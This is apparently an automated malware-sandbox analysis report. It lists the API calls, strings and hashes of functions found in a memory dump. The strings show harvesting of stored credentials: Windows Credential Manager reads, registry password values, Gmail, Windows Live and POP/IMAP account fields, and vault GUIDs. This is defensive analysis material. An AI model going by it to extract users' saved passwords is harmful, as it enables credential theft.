• Opcode ID: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
• Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
• Opcode Fuzzy Hash: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
• Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
APIs
• LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
• GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
• GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
• FreeLibrary.KERNEL32(00000000), ref: 004100C4
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
• API String ID: 2449869053-232097475
• Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
• Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
• Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
• Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
APIs
• RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
• memset.MSVCRT ref: 0040F84A
• RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
• RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
• LocalFree.KERNEL32(?), ref: 0040F92C
• RegCloseKey.ADVAPI32(?), ref: 0040F937
• RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
• RegCloseKey.ADVAPI32(?), ref: 0040F95F
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
• String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
• API String ID: 551151806-1288872324
• Opcode ID: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
• Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
• Opcode Fuzzy Hash: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
• Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
APIs
• sprintf.MSVCRT ref: 0040957B
• LoadMenuA.USER32(?,?), ref: 00409589
  • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
  • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
  • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
  • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
• DestroyMenu.USER32(00000000), ref: 004095A7
• sprintf.MSVCRT ref: 004095EB
• CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
• memset.MSVCRT ref: 0040961C
• GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
• EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
• DestroyWindow.USER32(00000000), ref: 0040965C
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
• String ID: caption$dialog_%d$menu_%d
• API String ID: 3259144588-3822380221
• Opcode ID: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
• Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
• Opcode Fuzzy Hash: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
• Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
APIs
  • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
• LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
• GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
• GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
• GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
• GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
• GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
• API String ID: 2449869053-4258758744
• Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
• Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
• Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
• Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
APIs
• wcsstr.MSVCRT ref: 0040426A
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
• _mbscpy.MSVCRT(?,?), ref: 004042D5
• _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
• strchr.MSVCRT ref: 004042F6
• strlen.MSVCRT ref: 0040430A
• sprintf.MSVCRT ref: 0040432B
• strchr.MSVCRT ref: 0040433C
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
• String ID: %s@gmail.com$www.google.com
• API String ID: 3866421160-4070641962
• Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
• Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
• Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
• Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
APIs
• _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409749
• _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409759
  • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
  • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,00000104,0044C52F,?,00001000,0045A448), ref: 00409355
  • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
• EnumResourceNamesA.KERNEL32(00000104,00000004,0040955A,00000000), ref: 0040978F
• EnumResourceNamesA.KERNEL32(00000104,00000005,0040955A,00000000), ref: 00409799
• _mbscpy.MSVCRT(0045A550,strings,?,00409862,00000000,?,00000000,00000104,?), ref: 004097A1
• memset.MSVCRT ref: 004097BD
• LoadStringA.USER32(00000104,00000000,?,00001000), ref: 004097D1
  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
• String ID: TranslatorName$TranslatorURL$general$strings
• API String ID: 1035899707-3647959541
• Opcode ID: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
• Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
• Opcode Fuzzy Hash: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
• Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
APIs
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: _strcmpi_strnicmpmemsetsprintf$strlen
• String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
• API String ID: 2360744853-2229823034
• Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
• Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
• Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
• Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • strchr.MSVCRT ref: 004100E4
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                      • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0041014D
                                                                                                                                                                                    • memset.MSVCRT ref: 00410129
                                                                                                                                                                                      • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                                                                                      • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
• memset.MSVCRT ref: 00410171
• memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
• _mbscat.MSVCRT ref: 00410197
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
• String ID: \systemroot
• API String ID: 912701516-1821301763
APIs
• UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
• UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
• UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
• memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
• CoTaskMemFree.COMBASE(00000000), ref: 00410970
Strings
• 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
• 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
• 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
• 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: FromStringUuid$FreeTaskmemcpy
• String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
• API String ID: 1640410171-2022683286
APIs
  • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
• memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
• memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
• memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
• memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
• memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
• memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memcpy$strlen
• String ID: -journal$-wal$immutable$nolock
• API String ID: 2619041689-3408036318
APIs
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: free$strlen
• String ID:
• API String ID: 667451143-3916222277
APIs
  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
• _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409686
• _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409696
• GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
  • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: PrivateProfile_mbscpy$AttributesFileString
• String ID: TranslatorName$TranslatorURL$charset$general$rtl
• API String ID: 888011440-2039793938
APIs
Strings
• out of memory, xrefs: 0042EBEF
• cannot ATTACH database within transaction, xrefs: 0042E966
• attached databases must use the same text encoding as main database, xrefs: 0042EAE6
• database %s is already in use, xrefs: 0042E9CE
• database is already attached, xrefs: 0042EA97
• too many attached databases - max %d, xrefs: 0042E951
• unable to open database: %s, xrefs: 0042EBD6
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memcpymemset
• String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
• API String ID: 1297977491-2001300268
APIs
  • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
• strchr.MSVCRT ref: 0040327B
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: PrivateProfileStringstrchr
• String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
• API String ID: 1348940319-1729847305
APIs
• memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
• memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
• memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memcpy
• String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
• API String ID: 3510742995-3273207271
                                                                                                                                                                                    • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                                    • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                                                                                                    • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                                    • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                    • memset.MSVCRT ref: 0040FA1E
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                                                                                                    • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                                                    • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                                    • API String ID: 945165440-3589380929
                                                                                                                                                                                    • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                                    • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                                                                                                                    • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                                    • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                      • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                      • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                      • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                                                                                                    • strchr.MSVCRT ref: 0040371F
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                                                                                                    • strlen.MSVCRT ref: 00403778
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040379C
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                                                                                    • String ID: %s@gmail.com
                                                                                                                                                                                    • API String ID: 3261640601-4097000612
                                                                                                                                                                                    • Opcode ID: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                                                                                                                    • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                                                                                                    • Opcode Fuzzy Hash: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004094C8
                                                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                                                                                    • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                                                                                    • memset.MSVCRT ref: 0040950C
                                                                                                                                                                                    • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 00409531
                                                                                                                                                                                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                                                    • String ID: sysdatetimepick32
                                                                                                                                                                                    • API String ID: 3411445237-4169760276
                                                                                                                                                                                    • Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                                                                                                    • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                                                                                    • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                                                                                    • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                                                                                    • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3642520215-0
                                                                                                                                                                                    • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                                    • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                                                                                                    • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                                                                                                    • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                                                                                    • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                                                                                    • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                                    • String ID:
